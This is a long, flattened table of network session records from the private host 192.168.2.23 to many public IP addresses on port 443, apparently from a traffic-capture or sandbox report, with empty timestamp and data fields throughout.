                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15954192.168.2.2357846157.142.244.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15955192.168.2.2354866111.180.140.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15956192.168.2.235203668.186.255.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15957192.168.2.235950675.244.54.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15958192.168.2.235223859.173.240.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15959192.168.2.234908482.155.64.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15960192.168.2.233324689.235.232.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15961192.168.2.233797884.148.224.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15962192.168.2.2340562122.73.89.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15963192.168.2.2343366111.92.75.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15964192.168.2.2343702107.40.26.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15965192.168.2.2333306149.223.199.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15966192.168.2.2338458210.192.214.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15967192.168.2.23375988.192.155.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15968192.168.2.235228691.106.133.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15969192.168.2.2335192216.76.218.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15970192.168.2.23343669.143.140.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15971192.168.2.2344760187.60.121.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15972192.168.2.2354092188.201.60.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15973192.168.2.2343324129.30.197.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15974192.168.2.235372036.41.53.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15975192.168.2.233776495.178.48.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15976192.168.2.2334590109.12.8.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15977192.168.2.2343434148.168.81.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15978192.168.2.2341688181.72.54.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15979192.168.2.2359606187.21.2.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15980192.168.2.23358322.28.42.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15981192.168.2.2348086126.167.149.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15982192.168.2.2346168150.5.18.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15983192.168.2.234501467.230.155.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15984192.168.2.233466627.112.87.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15985192.168.2.2333156110.91.240.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15986192.168.2.233815236.111.173.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15987192.168.2.2347842132.12.71.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15988192.168.2.2356664164.149.164.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15989192.168.2.2349438189.154.51.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15990192.168.2.233642690.143.80.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15991192.168.2.2353264125.251.189.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15992192.168.2.2360408184.200.168.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15993192.168.2.2344594117.227.168.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15994192.168.2.235688295.29.151.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15995192.168.2.2343666203.175.79.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15996192.168.2.2334448183.171.163.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15997192.168.2.2355648120.67.64.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15998192.168.2.235870468.82.185.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15999192.168.2.2356412197.251.15.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16000192.168.2.234883649.218.115.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16001192.168.2.2350906104.211.48.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16002192.168.2.2349976167.232.114.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16003192.168.2.234338090.74.246.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16004192.168.2.2357562186.74.160.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16005192.168.2.235543876.171.4.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16006192.168.2.2359892165.210.176.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16007192.168.2.2358892137.158.220.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16008192.168.2.2352104161.13.245.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16009192.168.2.2347674223.53.247.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16010192.168.2.2352834193.67.217.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16011192.168.2.2359568179.90.171.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16012192.168.2.2333922184.80.144.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16013192.168.2.235519438.179.213.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16014192.168.2.234392091.8.168.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16015192.168.2.234514081.35.125.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16016192.168.2.2333932130.95.101.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16017192.168.2.2339666118.78.233.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16018192.168.2.2351716177.241.27.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16019192.168.2.2353190101.73.244.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16020192.168.2.234802612.227.163.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16021192.168.2.2342414200.226.144.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16022192.168.2.2347274133.193.40.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16023192.168.2.2350638218.64.214.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16024192.168.2.233384059.33.22.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16025192.168.2.2337490101.10.227.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16026192.168.2.2357992119.191.146.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16027192.168.2.2357194165.71.32.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16028192.168.2.2344800174.87.103.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16029192.168.2.234176075.53.81.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16030192.168.2.2337490188.56.62.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16031192.168.2.2346994151.205.234.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16032192.168.2.2340224117.153.84.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16033192.168.2.2359180154.249.235.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16034192.168.2.234355813.131.44.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16035192.168.2.2353096185.105.245.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16036192.168.2.234669268.219.19.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16037192.168.2.235487274.130.54.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16038192.168.2.23468421.134.255.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16039192.168.2.2340854160.47.167.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16040192.168.2.234511089.168.147.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16041192.168.2.2333586210.248.35.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16042192.168.2.234394069.205.248.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16043192.168.2.235192875.125.225.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16044192.168.2.23562888.192.137.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16045192.168.2.2339494210.229.112.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16046192.168.2.2345702138.223.28.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16047192.168.2.2348050105.63.11.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16048192.168.2.2335626142.209.80.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16049192.168.2.235305267.169.148.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16050192.168.2.2358206109.123.255.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16051192.168.2.235710096.248.223.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16052192.168.2.234073886.8.213.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16053192.168.2.235156088.48.203.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16054192.168.2.236075214.119.80.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16055192.168.2.2349418193.49.13.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16056192.168.2.233756642.251.86.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16057192.168.2.233596478.118.36.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16058192.168.2.2336150185.87.101.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16059192.168.2.235736489.159.116.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16060192.168.2.235787217.45.12.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16061192.168.2.234598260.98.228.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16062192.168.2.23554561.168.167.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16063192.168.2.234379445.146.152.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16064192.168.2.2338338157.110.239.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16065192.168.2.2358066139.149.82.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16066192.168.2.234556623.225.90.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16067192.168.2.2355936121.76.71.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16068192.168.2.2334900115.228.206.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16069192.168.2.235418878.89.131.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16070192.168.2.2349400164.43.63.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16071192.168.2.2345602128.139.30.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16072192.168.2.2337712212.159.100.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16073192.168.2.2345572203.164.69.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16074192.168.2.234386638.104.23.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16075192.168.2.2338744222.175.55.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16076192.168.2.2341960216.198.157.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16077192.168.2.23521088.5.140.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16078192.168.2.2352984141.173.19.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16079192.168.2.234188025.136.237.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16080192.168.2.2352090199.128.20.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16081192.168.2.2348178135.186.221.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16082192.168.2.233825896.242.88.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16083192.168.2.2345852200.119.215.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16084192.168.2.235347072.93.50.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16085192.168.2.2341120135.97.51.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16086192.168.2.2354646171.125.245.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16087192.168.2.2353728149.68.180.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16088192.168.2.235938683.7.231.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16089192.168.2.233473865.51.170.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16090192.168.2.2358894130.239.158.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16091192.168.2.2348244212.75.12.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16092192.168.2.2335542179.33.161.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16093192.168.2.2355122151.245.108.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16094192.168.2.2332798148.6.152.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16095192.168.2.2346820126.198.240.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16096192.168.2.2343894157.53.148.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16097192.168.2.2346886111.249.74.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16098192.168.2.233831041.252.177.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16099192.168.2.235282423.105.130.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16100192.168.2.2359714219.154.159.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16101192.168.2.233592674.235.191.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16102192.168.2.2339384152.35.15.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16103192.168.2.233796625.243.79.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16104192.168.2.235612231.75.156.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16105192.168.2.2351164183.87.253.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16106192.168.2.2357628166.133.36.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16107192.168.2.235590454.131.169.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16108192.168.2.235716454.45.179.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16109192.168.2.234996287.132.100.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16110192.168.2.235792061.68.26.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16111192.168.2.235273454.128.136.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16112192.168.2.2338316157.16.203.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16113192.168.2.2344508211.87.152.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16114192.168.2.2356642168.220.71.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16115192.168.2.233893067.94.28.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16116192.168.2.234600877.138.186.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16117192.168.2.2345374130.0.216.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16118192.168.2.234715218.38.136.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16119192.168.2.2351762109.26.247.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16120192.168.2.2336776156.160.117.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16121192.168.2.234377293.14.45.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16122192.168.2.2357320107.49.119.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16123192.168.2.2358676134.135.170.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16124192.168.2.234145651.232.243.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16125192.168.2.2348872147.233.118.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16126192.168.2.2343446121.102.143.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16127192.168.2.233800891.99.137.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16128192.168.2.2336606140.145.227.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16129192.168.2.2339748136.254.74.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16130192.168.2.2332980141.62.32.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16131192.168.2.2359958216.42.133.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16132192.168.2.2345432149.241.238.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16133192.168.2.2339420129.217.50.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16134192.168.2.2334668207.180.119.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16135192.168.2.2354702198.218.145.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16136192.168.2.2356872206.132.180.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16137192.168.2.234282613.19.254.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16138192.168.2.2336528222.230.118.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16139192.168.2.2338392153.213.238.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16140192.168.2.2341614131.203.112.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16141192.168.2.234949653.127.105.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16142192.168.2.235203691.127.6.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16143192.168.2.2359938198.29.171.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16144192.168.2.2354228123.25.212.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16145192.168.2.235388246.123.164.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16146192.168.2.2347452121.179.164.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16147192.168.2.234567475.22.4.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16148192.168.2.2341000176.15.8.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16149192.168.2.234057636.31.106.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16150192.168.2.2335206206.42.34.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16151192.168.2.233407654.247.217.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16152192.168.2.233999066.219.85.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16153192.168.2.234654051.29.11.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16154192.168.2.2360912134.51.248.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16155192.168.2.2333030192.49.166.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16156192.168.2.2357170186.133.113.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16157192.168.2.2333854123.83.6.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16158192.168.2.2350384140.14.161.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16159192.168.2.23355181.201.122.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16160192.168.2.234424462.244.159.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16161192.168.2.2351586212.118.90.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16162192.168.2.2334674175.237.254.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16163192.168.2.2349402151.122.254.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16164192.168.2.234325453.186.217.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16165192.168.2.235899491.111.36.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16166192.168.2.234990247.72.253.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16167192.168.2.2335642218.222.206.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16168192.168.2.2358172194.140.11.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16169192.168.2.233487823.106.5.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16170192.168.2.2337590211.194.158.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16171192.168.2.2340122130.119.129.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16172192.168.2.2336350103.96.152.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16173192.168.2.234422266.79.67.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16174192.168.2.234765837.194.4.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16175192.168.2.235015297.223.113.110443
